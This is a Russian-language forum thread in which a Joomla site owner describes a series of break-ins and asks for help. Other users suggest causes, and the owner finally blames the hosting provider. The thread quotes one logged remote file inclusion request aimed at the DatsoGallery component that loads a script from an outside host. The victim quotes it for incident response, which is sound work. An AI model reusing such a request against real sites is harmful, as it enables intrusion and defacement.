Здравствуйте, очень нужна ваша помощь, стояла джумла 1.0.13, было много файлов в ней с правами 777 в том числе и конфиг, в один прекрасный день сломали, в логах сайта нашел такой запрос /component/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? а с ней еще 5 сайтов с того акаунта хостинга, в главного сайта просто удалили базу, в других то конфиг поменяли то в базе что то сменили. Сменили права на все файлы и папки, пропатчили датсо, так как подозревали что в ней дыра, дальше сломал, нашел файлик ленгвиджный с правами 777, все исправили, все папки 755 все файлы 644, поставили дждефендер, сменили название конфига и спрятали его, дальше ломает, но теперь только прописывает свой html код в базу, в таблицу content, обновили недавно джумлу до 0.15, дальше продолжаеться, в логах подозрительных запросов вроде нет ps надо сказать что искал измененный файлы за этот день взлома, нет никаких признаков сторонних и измененных файлов, проверял комп на вирусы двумя антивирями, остальные админы тоже, вобщем уже руки опускаються, хз что делать((
Нет подозрительного в логах, то мне видится три возможности: по фтп, просто через админку или редактирование контента. Поменять пароли на фтп, на сайт(ы), проверить пользователей. P.S. третья причина: что-то не досмотрел в логах.
все пароли неоднократно уже менялись, админка тоже запаролена .htacces'ом, получает каким то образом доступ к баазе((
А может покажите access.log Проверили пользователей? content можно и с фронта менять. А база не открывается с интернета? На базу пароли меняли?
меняли пароли и на базу, смотрел время взлома по времени последнего изменения взломаной таблицы, судя по логах в то время на сайту только гугловский и яхушный бот лазили
проблема была в хостере, но он упорно не признавался, и еще привет тому уроду который ломал ибо он нашел эту тему и читает ее)) спасибо sectus за попытку помочь)
